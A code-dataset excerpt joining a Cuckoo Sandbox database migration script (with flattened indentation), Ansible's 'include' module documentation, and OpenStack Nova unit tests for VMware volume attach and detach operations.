# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
elif conn.engine.driver == "pysqlite":
# Edit task status enumeration in Task.
# NOTE: To workaround limitations in SQLite we have to create a temporary table, create the new schema and copy data.
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
d["id"] = item[0]
d["target"] = item[1]
d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["added_on"] = item[12]
else:
d["added_on"] = parse(item[12])
if isinstance(item[13], datetime):
d["started_on"] = item[13]
else:
d["started_on"] = parse(item[13])
if isinstance(item[14], datetime):
d["completed_on"] = item[14]
else:
d["completed_on"] = parse(item[14])
d["status"] = item[15]
d["sample_id"] = item[16]
# Force clock.
# NOTE: We added this new column so we force clock time to the added_on for old analyses.
d["clock"] = d["added_on"]
# Enum migration, "success" isn"t a valid state now.
if d["status"] == "success":
d["status"] = "completed"
tasks_data.append(d)
# Rename original table.
op.rename_table("tasks", "old_tasks")
# Drop old table.
op.drop_table("old_tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create new table with 1.0 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), server_default=sa.func.now(), nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
# Migrate mongo.
mongo_upgrade()
def mongo_upgrade():
"""Migrate mongodb schema and data."""
# Read reporting.conf to fetch mongo configuration.
config = Config(cfg=os.path.join("..", "..", "conf", "reporting.conf"))
# Run migration only if mongo is enabled as reporting module.
if config.mongodb.enabled:
host = config.mongodb.get("host", "127.0.0.1")
port = config.mongodb.get("port", 27017)
print "Mongo reporting is enabled, strarting mongo data migration."
# Connect.
try:
conn = Connection(host, port)
db = conn.cuckoo
except TypeError:
print "Mongo connection port must be integer"
sys.exit()
except ConnectionFailure:
print "Cannot connect to MongoDB"
sys.exit()
# Check for schema version and create it.
if "cuckoo_schema" in db.collection_names():
print "Mongo schema version not expected"
sys.exit()
else:
db.cuckoo_schema.save({"version": mongo_revision})
else:
print "Mongo reporting module not enabled, skipping mongo migration."
def downgrade():
# We don"t support downgrade.
pass
| gpl-3.0 | 793,602,748,365,122,200 | 47.558923 | 233 | 0.575163 | false |
brokenjacobs/ansible | lib/ansible/modules/utilities/logic/include.py | 50 | 2305 | #!/usr/bin/python
# -*- mode: python -*-
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
author:
- "Ansible Core Team (@ansible)"
module: include
short_description: include a play or task list.
description:
- Includes a file with a list of plays or tasks to be executed in the current playbook.
- Files with a list of plays can only be included at the top level, lists of tasks can only be included where tasks normally run (in play).
- Before 2.0 all includes were 'static', executed at play compile time.
- Static includes are not subject to most directives, for example, loops or conditionals, they are applied instead to each inherited task.
- Since 2.0 task includes are dynamic and behave more like real tasks. This means they can be looped, skipped and use variables from any source.
Ansible tries to auto detect this, use the `static` directive (new in 2.1) to bypass autodetection.
version_added: "0.6"
options:
free-form:
description:
- This module allows you to specify the name of the file directly w/o any other options.
notes:
- This is really not a module, though it appears as such, this is a feature of the Ansible Engine, as such it cannot be overridden the same way a
module can.
'''
EXAMPLES = """
# include a play after another play
- hosts: localhost
tasks:
- debug:
msg: "play1"
- include: otherplays.yml
# include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: stuff.yml
- debug:
msg: task10
# dyanmic include task list in play
- hosts: all
tasks:
- debug:
msg: task1
- include: "{{ hostvar }}.yml"
static: no
when: hostvar is defined
"""
RETURN = """
# this module does not return anything except plays or tasks to execute
"""
| gpl-3.0 | -6,607,312,639,857,545,000 | 30.575342 | 150 | 0.678959 | false |
gooddata/openstack-nova | nova/tests/unit/virt/vmwareapi/test_volumeops.py | 2 | 33206 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_utils.fixture import uuidsentinel
from oslo_vmware import exceptions as oslo_vmw_exceptions
from oslo_vmware import vim_util as vutil
from nova.compute import power_state
from nova.compute import vm_states
from nova import context
from nova import exception
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.image import fake as image_fake
from nova.tests.unit.virt.vmwareapi import fake as vmwareapi_fake
from nova.tests.unit.virt.vmwareapi import stubs
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import driver
from nova.virt.vmwareapi import vm_util
from nova.virt.vmwareapi import volumeops
class VMwareVolumeOpsTestCase(test.NoDBTestCase):
def setUp(self):
super(VMwareVolumeOpsTestCase, self).setUp()
vmwareapi_fake.reset()
stubs.set_stubs(self)
self._session = driver.VMwareAPISession()
self._context = context.RequestContext('fake_user', 'fake_project')
self._volumeops = volumeops.VMwareVolumeOps(self._session)
self._image_id = image_fake.get_valid_image_id()
self._instance_values = {
'name': 'fake_name',
'uuid': uuidsentinel.foo,
'vcpus': 1,
'memory_mb': 512,
'image_ref': self._image_id,
'root_gb': 10,
'node': 'respool-1001(MyResPoolName)',
'expected_attrs': ['system_metadata'],
}
self._instance = fake_instance.fake_instance_obj(self._context,
**self._instance_values)
def _test_detach_disk_from_vm(self, destroy_disk=False):
def fake_call_method(module, method, *args, **kwargs):
vmdk_detach_config_spec = kwargs.get('spec')
virtual_device_config = vmdk_detach_config_spec.deviceChange[0]
self.assertEqual('remove', virtual_device_config.operation)
self.assertEqual('ns0:VirtualDeviceConfigSpec',
virtual_device_config.obj_name)
if destroy_disk:
self.assertEqual('destroy',
virtual_device_config.fileOperation)
else:
self.assertFalse(hasattr(virtual_device_config,
'fileOperation'))
return 'fake_configure_task'
with test.nested(
mock.patch.object(self._session, '_wait_for_task'),
mock.patch.object(self._session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
fake_device = vmwareapi_fake.DataObject()
fake_device.backing = vmwareapi_fake.DataObject()
fake_device.backing.fileName = 'fake_path'
fake_device.key = 'fake_key'
self._volumeops.detach_disk_from_vm('fake_vm_ref', self._instance,
fake_device, destroy_disk)
_wait_for_task.assert_has_calls([
mock.call('fake_configure_task')])
def test_detach_with_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=True)
def test_detach_without_destroy_disk_from_vm(self):
self._test_detach_disk_from_vm(destroy_disk=False)
def _fake_call_get_object_property(self, uuid, result):
def fake_call_method(vim, method, vm_ref, prop):
expected_prop = 'config.extraConfig["volume-%s"]' % uuid
self.assertEqual('VirtualMachine', vm_ref._type)
self.assertEqual(expected_prop, prop)
return result
return fake_call_method
def test_get_volume_uuid(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
opt_val = vmwareapi_fake.OptionValue('volume-%s' % uuid, 'volume-val')
fake_call = self._fake_call_get_object_property(uuid, opt_val)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertEqual('volume-val', val)
def test_get_volume_uuid_not_found(self):
vm_ref = vmwareapi_fake.ManagedObjectReference('VirtualMachine',
'vm-134')
uuid = '1234'
fake_call = self._fake_call_get_object_property(uuid, None)
with mock.patch.object(self._session, "_call_method", fake_call):
val = self._volumeops._get_volume_uuid(vm_ref, uuid)
self.assertIsNone(val)
def test_attach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref'),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_info,
get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._attach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_extra_config_spec',
return_value=mock.sentinel.extra_config)
@mock.patch.object(vm_util, 'reconfigure_vm')
def test_update_volume_details(self, reconfigure_vm,
get_vm_extra_config_spec):
volume_uuid = '26f5948e-52a3-4ee6-8d48-0a379afd0828'
device_uuid = '0d86246a-2adb-470d-a9f7-bce09930c5d'
self._volumeops._update_volume_details(
mock.sentinel.vm_ref, volume_uuid, device_uuid)
get_vm_extra_config_spec.assert_called_once_with(
self._volumeops._session.vim.client.factory,
{'volume-%s' % volume_uuid: device_uuid})
reconfigure_vm.assert_called_once_with(self._volumeops._session,
mock.sentinel.vm_ref,
mock.sentinel.extra_config)
def _fake_connection_info(self):
return {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device(self, get_vmdk_backed_disk_device,
get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
device = mock.sentinel.device
get_vmdk_backed_disk_device.return_value = device
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
ret = self._volumeops._get_vmdk_backed_disk_device(
vm_ref, connection_info['data'])
self.assertEqual(device, ret)
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_volume_uuid')
@mock.patch.object(vm_util, 'get_vmdk_backed_disk_device')
def test_get_vmdk_backed_disk_device_with_missing_disk_device(
self, get_vmdk_backed_disk_device, get_volume_uuid):
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
disk_uuid = mock.sentinel.disk_uuid
get_volume_uuid.return_value = disk_uuid
get_vmdk_backed_disk_device.return_value = None
vm_ref = mock.sentinel.vm_ref
connection_info = self._fake_connection_info()
self.assertRaises(exception.DiskNotFound,
self._volumeops._get_vmdk_backed_disk_device,
vm_ref, connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_volume_uuid.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'])
get_vmdk_backed_disk_device.assert_called_once_with(hardware_devices,
disk_uuid)
def test_detach_volume_vmdk(self):
vmdk_info = vm_util.VmdkInfo('fake-path', 'lsiLogic', 'thin',
1024, 'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref',
return_value=mock.sentinel.volume_ref),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device',
return_value=mock.sentinel.device),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, '_consolidate_vmdk_volume'),
mock.patch.object(self._volumeops, 'detach_disk_from_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, consolidate_vmdk_volume, detach_disk_from_vm,
update_volume_details):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id':
'd11a82de-ddaa-448d-b50a-a255a7e61a1e'
}}
instance = mock.MagicMock(name='fake-name',
vm_state=vm_states.ACTIVE)
self._volumeops._detach_volume_vmdk(connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
get_vmdk_info.assert_called_once_with(self._volumeops._session,
mock.sentinel.volume_ref)
consolidate_vmdk_volume.assert_called_once_with(
instance, mock.sentinel.vm_ref, mock.sentinel.device,
mock.sentinel.volume_ref, adapter_type=vmdk_info.adapter_type,
disk_type=vmdk_info.disk_type)
detach_disk_from_vm.assert_called_once_with(mock.sentinel.vm_ref,
instance,
mock.sentinel.device)
update_volume_details.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data']['volume_id'], "")
def test_detach_volume_vmdk_invalid(self):
connection_info = {'driver_volume_type': 'vmdk',
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
instance = mock.MagicMock(name='fake-name', vm_state=vm_states.ACTIVE)
vmdk_info = vm_util.VmdkInfo('fake-path', constants.ADAPTER_TYPE_IDE,
constants.DISK_TYPE_PREALLOCATED, 1024,
'fake-device')
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref',
return_value=mock.sentinel.vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(self._volumeops,
'_get_vmdk_backed_disk_device'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(vm_util, 'get_vm_state',
return_value=power_state.RUNNING)
) as (get_vm_ref, get_volume_ref, get_vmdk_backed_disk_device,
get_vmdk_info, get_vm_state):
self.assertRaises(exception.Invalid,
self._volumeops._detach_volume_vmdk, connection_info,
instance)
get_vm_ref.assert_called_once_with(self._volumeops._session,
instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
get_vmdk_backed_disk_device.assert_called_once_with(
mock.sentinel.vm_ref, connection_info['data'])
self.assertTrue(get_vmdk_info.called)
get_vm_state.assert_called_once_with(self._volumeops._session,
instance)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi(self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
device = mock.sentinel.device
get_rdm_disk.return_value = device
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self._volumeops._detach_volume_iscsi(connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
detach_disk_from_vm.assert_called_once_with(
vm_ref, instance, device, destroy_disk=True)
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
def test_detach_volume_iscsi_with_missing_iscsi_target(
self, iscsi_get_target, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
iscsi_get_target.return_value = (None, None)
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.StorageError, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(self._volumeops._session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
@mock.patch.object(vm_util, 'get_vm_ref')
@mock.patch.object(vm_util, 'get_rdm_disk')
@mock.patch.object(volumeops.VMwareVolumeOps, '_iscsi_get_target')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
def test_detach_volume_iscsi_with_missing_disk_device(
self, detach_disk_from_vm, iscsi_get_target,
get_rdm_disk, get_vm_ref):
vm_ref = mock.sentinel.vm_ref
get_vm_ref.return_value = vm_ref
device_name = mock.sentinel.device_name
disk_uuid = mock.sentinel.disk_uuid
iscsi_get_target.return_value = (device_name, disk_uuid)
session = mock.Mock()
self._volumeops._session = session
hardware_devices = mock.sentinel.hardware_devices
session._call_method.return_value = hardware_devices
get_rdm_disk.return_value = None
connection_info = self._fake_connection_info()
instance = mock.sentinel.instance
self.assertRaises(
exception.DiskNotFound, self._volumeops._detach_volume_iscsi,
connection_info, instance)
get_vm_ref.assert_called_once_with(session, instance)
iscsi_get_target.assert_called_once_with(connection_info['data'])
session._call_method.assert_called_once_with(
vutil, "get_object_property", vm_ref, "config.hardware.device")
get_rdm_disk.assert_called_once_with(hardware_devices, disk_uuid)
self.assertFalse(detach_disk_from_vm.called)
def _test_attach_volume_vmdk(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_VMDK,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
volume_device = mock.MagicMock()
volume_device.backing.fileName = 'fake-path'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
disk_type = constants.DEFAULT_DISK_TYPE
disk_uuid = 'e97f357b-331e-4ad1-b726-89be048fb811'
backing = mock.Mock(uuid=disk_uuid)
device = mock.Mock(backing=backing)
vmdk_info = vm_util.VmdkInfo('fake-path', default_adapter_type,
disk_type, 1024,
device)
adapter_type = adapter_type or default_adapter_type
if adapter_type == constants.ADAPTER_TYPE_IDE:
vm_state = power_state.SHUTDOWN
else:
vm_state = power_state.RUNNING
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_get_volume_ref'),
mock.patch.object(vm_util, 'get_vmdk_info',
return_value=vmdk_info),
mock.patch.object(self._volumeops, 'attach_disk_to_vm'),
mock.patch.object(self._volumeops, '_update_volume_details'),
mock.patch.object(vm_util, 'get_vm_state',
return_value=vm_state)
) as (get_vm_ref, get_volume_ref, get_vmdk_info, attach_disk_to_vm,
update_volume_details, get_vm_state):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
get_volume_ref.assert_called_once_with(
connection_info['data']['volume'])
self.assertTrue(get_vmdk_info.called)
attach_disk_to_vm.assert_called_once_with(
vm_ref, self._instance, adapter_type,
constants.DISK_TYPE_PREALLOCATED, vmdk_path='fake-path')
update_volume_details.assert_called_once_with(
vm_ref, connection_info['data']['volume_id'], disk_uuid)
if adapter_type == constants.ADAPTER_TYPE_IDE:
get_vm_state.assert_called_once_with(self._volumeops._session,
self._instance)
else:
self.assertFalse(get_vm_state.called)
def _test_attach_volume_iscsi(self, adapter_type=None):
connection_info = {'driver_volume_type': constants.DISK_FORMAT_ISCSI,
'serial': 'volume-fake-id',
'data': {'volume': 'vm-10',
'volume_id': 'volume-fake-id'}}
vm_ref = 'fake-vm-ref'
default_adapter_type = constants.DEFAULT_ADAPTER_TYPE
adapter_type = adapter_type or default_adapter_type
with test.nested(
mock.patch.object(vm_util, 'get_vm_ref', return_value=vm_ref),
mock.patch.object(self._volumeops, '_iscsi_discover_target',
return_value=(mock.sentinel.device_name,
mock.sentinel.uuid)),
mock.patch.object(vm_util, 'get_scsi_adapter_type',
return_value=adapter_type),
mock.patch.object(self._volumeops, 'attach_disk_to_vm')
) as (get_vm_ref, iscsi_discover_target, get_scsi_adapter_type,
attach_disk_to_vm):
self._volumeops.attach_volume(connection_info, self._instance,
adapter_type)
get_vm_ref.assert_called_once_with(self._volumeops._session,
self._instance)
iscsi_discover_target.assert_called_once_with(
connection_info['data'])
if adapter_type is None:
self.assertTrue(get_scsi_adapter_type.called)
attach_disk_to_vm.assert_called_once_with(vm_ref,
self._instance, adapter_type, 'rdmp',
device_name=mock.sentinel.device_name)
def test_attach_volume_vmdk(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_IDE,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_vmdk(adapter_type)
def test_attach_volume_iscsi(self):
for adapter_type in (None, constants.DEFAULT_ADAPTER_TYPE,
constants.ADAPTER_TYPE_BUSLOGIC,
constants.ADAPTER_TYPE_LSILOGICSAS,
constants.ADAPTER_TYPE_PARAVIRTUAL):
self._test_attach_volume_iscsi(adapter_type)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
def test_consolidate_vmdk_volume_with_no_relocate(
self, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
device = mock.Mock(backing=backing)
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
self._volumeops._consolidate_vmdk_volume(self._instance, vm_ref,
device, volume_ref)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
self.assertFalse(relocate_vm.called)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_relocate(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
detach_disk_from_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException]
instance = self._instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_vm.assert_called_once_with(self._session,
volume_ref, rp, datastore, host)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device, destroy_disk=True)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
@mock.patch.object(volumeops.VMwareVolumeOps,
'_get_vmdk_base_volume_device')
@mock.patch.object(vm_util, 'relocate_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_host_of_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, '_get_res_pool_of_host')
@mock.patch.object(volumeops.VMwareVolumeOps, 'detach_disk_from_vm')
@mock.patch.object(volumeops.VMwareVolumeOps, 'attach_disk_to_vm')
def test_consolidate_vmdk_volume_with_missing_vmdk(
self, attach_disk_to_vm, detach_disk_from_vm, get_res_pool_of_host,
get_host_of_vm, relocate_vm, get_vmdk_base_volume_device):
file_name = mock.sentinel.file_name
backing = mock.Mock(fileName=file_name)
original_device = mock.Mock(backing=backing)
get_vmdk_base_volume_device.return_value = original_device
new_file_name = mock.sentinel.new_file_name
datastore = mock.sentinel.datastore
new_backing = mock.Mock(fileName=new_file_name, datastore=datastore)
device = mock.Mock(backing=new_backing)
host = mock.sentinel.host
get_host_of_vm.return_value = host
rp = mock.sentinel.rp
get_res_pool_of_host.return_value = rp
relocate_vm.side_effect = [
oslo_vmw_exceptions.FileNotFoundException, None]
instance = mock.sentinel.instance
volume_ref = mock.sentinel.volume_ref
vm_ref = mock.sentinel.vm_ref
adapter_type = constants.ADAPTER_TYPE_BUSLOGIC
disk_type = constants.DISK_TYPE_EAGER_ZEROED_THICK
self._volumeops._consolidate_vmdk_volume(instance, vm_ref, device,
volume_ref, adapter_type,
disk_type)
get_vmdk_base_volume_device.assert_called_once_with(volume_ref)
relocate_calls = [mock.call(self._session, volume_ref, rp, datastore,
host),
mock.call(self._session, volume_ref, rp, datastore,
host)]
self.assertEqual(relocate_calls, relocate_vm.call_args_list)
detach_disk_from_vm.assert_called_once_with(
volume_ref, instance, original_device)
attach_disk_to_vm.assert_called_once_with(
volume_ref, instance, adapter_type, disk_type,
vmdk_path=new_file_name)
def test_iscsi_get_host_iqn(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
return_value=host_mor),
mock.patch.object(self._volumeops._session, '_call_method',
return_value=hbas)
) as (fake_get_host_ref_for_vm, fake_call_method):
result = self._volumeops._iscsi_get_host_iqn(self._instance)
fake_get_host_ref_for_vm.assert_called_once_with(
self._volumeops._session, self._instance)
fake_call_method.assert_called_once_with(vutil,
"get_object_property",
host_mor,
"config.storageDevice.hostBusAdapter")
self.assertEqual(iqn, result)
def test_iscsi_get_host_iqn_instance_not_found(self):
host_mor = mock.Mock()
iqn = 'iscsi-name'
hba = vmwareapi_fake.HostInternetScsiHba(iqn)
hbas = mock.MagicMock(HostHostBusAdapter=[hba])
with test.nested(
mock.patch.object(vm_util, 'get_host_ref_for_vm',
side_effect=exception.InstanceNotFound('fake')),
